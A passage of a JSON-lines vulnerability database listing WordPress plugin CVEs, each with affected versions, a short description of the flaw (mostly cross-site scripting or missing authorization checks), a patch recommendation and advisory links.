link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abundatrade-plugin\\\/tags\\\/1.8.02\\\/abundatrade_pugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abundatrade-plugin\\\/tags\\\/1.8.02\\\/abundatrade_pugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-reorder-image-text-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-reorder-image-text-slider\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb8a509-9acd-457c-8cb9-725f615148ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb8a509-9acd-457c-8cb9-725f615148ce?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7658","slug":"temporarily-hidden-content","versionImpact":"1.0.6","description":"The Temporarily Hidden Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'temphc-start' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/temporarily-hidden-content\\\/trunk\\\/includes\\\/class-temporarily-hidden-content-public.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/temporarily-hidden-content\\\/trunk\\\/includes\\\/class-temporarily-hidden-content-public.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/temporarily-hidden-content\\\/trunk\\\/templates\\\/countdown_view.tpl\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/temporarily-hidden-content\\\/trunk\\\/templates\\\/countdown_view.tpl\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67afe49c-3560-414b-b848-b91a03bf7556?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67afe49c-3560-414b-b848-b91a03bf7556?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0212","slug":"advanced-recent-posts","versionImpact":"0.6.14","description":"The Advanced Recent Posts WordPress plugin through 0.6.14 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5fdd44aa-7f3f-423a-9fb0-dc9dc36f33a3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5fdd44aa-7f3f-423a-9fb0-dc9dc36f33a3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5905","slug":"demomentsomtres-wp-export","versionImpact":"20220825","description":"The DeMomentSomTres WordPress Export Posts With Images WordPress plugin through 20220825 does not check authorization of requests to export the blog data, allowing any logged in user, such as subscribers to export the contents of the blog, including restricted and unpublished posts, as well as passwords of protected posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f94e91ef-1773-476c-9945-37e89ceefd3f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f94e91ef-1773-476c-9945-37e89ceefd3f\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3277","slug":"yumpu-epaper-publishing","versionImpact":"2.0.24","description":"The Yumpu ePaper publishing plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_handler function in all versions up to, and including, 2.0.24. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload PDF files and publish them, as well as modify the API key.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed507ac7-6732-4315-99dd-0a8636cc9cc3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed507ac7-6732-4315-99dd-0a8636cc9cc3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yumpu-epaper-publishing\\\/trunk\\\/yumpu.php#L259\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yumpu-epaper-publishing\\\/trunk\\\/yumpu.php#L259\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6226","slug":"wpstickybar-sticky-bar-sticky-header","versionImpact":"2.1.0","description":"The WpStickyBar  WordPress plugin through 2.1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e42ce8dc-51d4-471d-b3bb-ad2a6b735d02\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e42ce8dc-51d4-471d-b3bb-ad2a6b735d02\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11201","slug":"mycred","versionImpact":"2.7.5.2","description":"The myCred \u2013 Loyalty Points and Rewards plugin for WordPress and WooCommerce \u2013 Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mycred_send shortcode in all versions up to, and including, 2.7.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mycred\\\/tags\\\/2.7.5\\\/includes\\\/shortcodes\\\/mycred_send.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mycred\\\/tags\\\/2.7.5\\\/includes\\\/shortcodes\\\/mycred_send.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203071\\\/mycred\\\/trunk\\\/includes\\\/shortcodes\\\/mycred_send.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203071\\\/mycred\\\/trunk\\\/includes\\\/shortcodes\\\/mycred_send.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mycred\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mycred\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d1d9bee-4afa-44cc-8e7a-8a73ad018c4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d1d9bee-4afa-44cc-8e7a-8a73ad018c4a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11825","slug":"broadstreet","versionImpact":"1.50.3","description":"The Broadstreet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018zone\u2019 parameter in all versions up to, and including, 1.50.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broadstreet\\\/tags\\\/1.50.1\\\/Broadstreet\\\/Utility.php#L199\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broadstreet\\\/tags\\\/1.50.1\\\/Broadstreet\\\/Utility.php#L199\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/broadstreet\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/broadstreet\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aeda43bc-eeee-463d-80b7-dec7975b4d19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aeda43bc-eeee-463d-80b7-dec7975b4d19?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13634","slug":"post-sync","versionImpact":"1.1","description":"The Post Sync WordPress plugin through 1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e60bf74-19fb-441c-85a8-005def36af9a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e60bf74-19fb-441c-85a8-005def36af9a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13885","slug":"wp-e-customers","versionImpact":"0.0.1","description":"The WP e-Customers Beta WordPress plugin through 0.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b64d17d6-8416-476e-ad78-b7b9cb85b84f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b64d17d6-8416-476e-ad78-b7b9cb85b84f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2544","slug":"ai-content-pipelines","versionImpact":"1.6","description":"The AI Content Pipelines plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-content-pipelines\\\/tags\\\/1.6\\\/includes\\\/generate-scheduled-content.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-content-pipelines\\\/tags\\\/1.6\\\/includes\\\/generate-scheduled-content.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-content-pipelines\\\/tags\\\/1.6\\\/includes\\\/generate-scheduled-content.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-content-pipelines\\\/tags\\\/1.6\\\/includes\\\/generate-scheduled-content.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-content-pipelines\\\/tags\\\/1.6\\\/includes\\\/generate-scheduled-content.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-content-pipelines\\\/tags\\\/1.6\\\/includes\\\/generate-scheduled-content.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ai-content-pipelines\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ai-content-pipelines\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b93214ec-5738-4f10-b48c-1d74aad52acb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b93214ec-5738-4f10-b48c-1d74aad52acb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4172","slug":"vertical-response-newsletter-widget","versionImpact":"1.6","description":"The VerticalResponse Newsletter Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'verticalresponse' shortcode in all versions up to, and including, 1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/vertical-response-newsletter-widget\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/vertical-response-newsletter-widget\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0565cdf1-55fe-4676-8529-8c79be5e8b01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0565cdf1-55fe-4676-8529-8c79be5e8b01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7655","slug":"live-stream-badger","versionImpact":"1.4.3","description":"The Live Stream Badger plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'livestream' shortcode in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/live-stream-badger\\\/tags\\\/1.4.3\\\/shortcode\\\/class-embedded-stream.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/live-stream-badger\\\/tags\\\/1.4.3\\\/shortcode\\\/class-embedded-stream.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/live-stream-badger\\\/tags\\\/1.4.3\\\/view\\\/class-embedded-twitch-view.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/live-stream-badger\\\/tags\\\/1.4.3\\\/view\\\/class-embedded-twitch-view.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22a30301-f409-4c53-84d7-7799fb41c25b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22a30301-f409-4c53-84d7-7799fb41c25b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-22721","slug":"oi-yamaps","versionImpact":"3.2.7","description":"Auth. Stored Cross-Site Scripting (XSS) in Oi Yandex.Maps for WordPress <= 3.2.7 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/oi-yamaps\\\/wordpress-oi-yandex-maps-for-wordpress-plugin-3-2-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/oi-yamaps\\\/wordpress-oi-yandex-maps-for-wordpress-plugin-3-2-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0165","slug":"nd-projects","versionImpact":"1.8","description":"The Cost Calculator WordPress plugin through 1.8 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f00b82f7-d8ad-4f6b-b791-81cc16b6336b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f00b82f7-d8ad-4f6b-b791-81cc16b6336b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5210","slug":"amp-plus","versionImpact":"3.0","description":"The AMP+ Plus WordPress plugin through 3.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c3ff47a-12a5-49c1-a166-2c57e5c0d0aa\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c3ff47a-12a5-49c1-a166-2c57e5c0d0aa\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4925","slug":"yikes-inc-easy-mailchimp-extender","versionImpact":"6.8.10","description":"The Easy Forms for Mailchimp WordPress plugin through 6.8.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b094cba-9288-4c9c-87a9-bdce286fe8b6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b094cba-9288-4c9c-87a9-bdce286fe8b6\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3603","slug":"osm","versionImpact":"6.0.2","description":"The OSM \u2013 OpenStreetMap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'osm_map' shortcode in all versions up to, and including, 6.0.2 due to insufficient input sanitization and output escaping on user supplied attributes such as 'theme'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/845cea77-ea74-4459-817b-cfbdb877b75a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/845cea77-ea74-4459-817b-cfbdb877b75a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/osm\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/osm\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6224","slug":"send-email-only-on-reply-to-my-comment","versionImpact":"1.0.6","description":"The Send email only on Reply to My Comment WordPress plugin through 1.0.6 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54457f1b-6572-4de0-9100-3433c715c5ce\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54457f1b-6572-4de0-9100-3433c715c5ce\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13633","slug":"simple-catalogue","versionImpact":"1.0.2","description":"The Simple catalogue WordPress plugin through 1.0.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4291d5eb-c006-42b0-accf-90f09f26b6a0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4291d5eb-c006-42b0-accf-90f09f26b6a0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13884","slug":"limit-bio","versionImpact":"1.0","description":"The Limit Bio WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/759a60ac-c890-4961-91e4-53db5096eb3c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/759a60ac-c890-4961-91e4-53db5096eb3c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0810","slug":"expand-maker","versionImpact":"3.4.5","description":"The Read More & Accordion plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.4.5. This is due to missing or incorrect nonce validation on the addNewButtons() function. This makes it possible for unauthenticated attackers to include and execute arbitrary PHP files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/classes\\\/ReadMoreInit.php#L122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/classes\\\/ReadMoreInit.php#L122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/classes\\\/ReadMorePages.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/classes\\\/ReadMorePages.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/classes\\\/ReadMorePages.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/classes\\\/ReadMorePages.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a963cd9b-9f8f-4bd2-92cd-74c5e85e1d96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a963cd9b-9f8f-4bd2-92cd-74c5e85e1d96?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4170","slug":"xavins-review-ratings","versionImpact":"1.4.0","description":"The Xavin&#039;s Review Ratings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'xrr' shortcode in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xavins-review-ratings\\\/trunk\\\/xavins-review-ratings.php#L293\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xavins-review-ratings\\\/trunk\\\/xavins-review-ratings.php#L293\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c057a98-4a8d-408a-b6a4-3c322bfa0cdf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c057a98-4a8d-408a-b6a4-3c322bfa0cdf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7653","slug":"epaybg-payments","versionImpact":"0.1","description":"The EPay.bg Payments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'epay' shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/epaybg-payments\\\/tags\\\/0.1\\\/epay-payments.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/epaybg-payments\\\/tags\\\/0.1\\\/epay-payments.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e35e79a-4838-4ed9-bd08-80e8f9043ec4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e35e79a-4838-4ed9-bd08-80e8f9043ec4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0447","slug":"youtube-channel","versionImpact":"3.0.12.1","description":"The My YouTube Channel plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the clear_all_cache function in versions up to, and including, 3.0.12.1. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to clear the plugin's cache.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2844200%40youtube-channel&new=2844200%40youtube-channel&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2844200%40youtube-channel&new=2844200%40youtube-channel&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/486b6a75-d101-4f3a-8436-6c23dd0ff200\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/486b6a75-d101-4f3a-8436-6c23dd0ff200\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youtube-channel\\\/trunk\\\/youtube-channel.php?rev=2482795#L1502\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youtube-channel\\\/trunk\\\/youtube-channel.php?rev=2482795#L1502\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0078","slug":"resume-builder","versionImpact":"3.1.1","description":"The Resume Builder WordPress plugin through 3.1.1 does not sanitize and escape some parameters related to Resume, which could allow users with a role as low as subscriber to perform Stored XSS attacks against higher privilege users","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e667854f-56f8-4dbe-9573-6652a8aacc2c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e667854f-56f8-4dbe-9573-6652a8aacc2c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45829","slug":"newsletter-bulk-email","versionImpact":"2.0.1","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in HappyBox Newsletter & Bulk Email Sender \u2013 Email Newsletter Plugin for WordPress plugin <=\u00a02.0.1 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/newsletter-bulk-email\\\/wordpress-newsletter-bulk-email-sender-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/newsletter-bulk-email\\\/wordpress-newsletter-bulk-email-sender-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
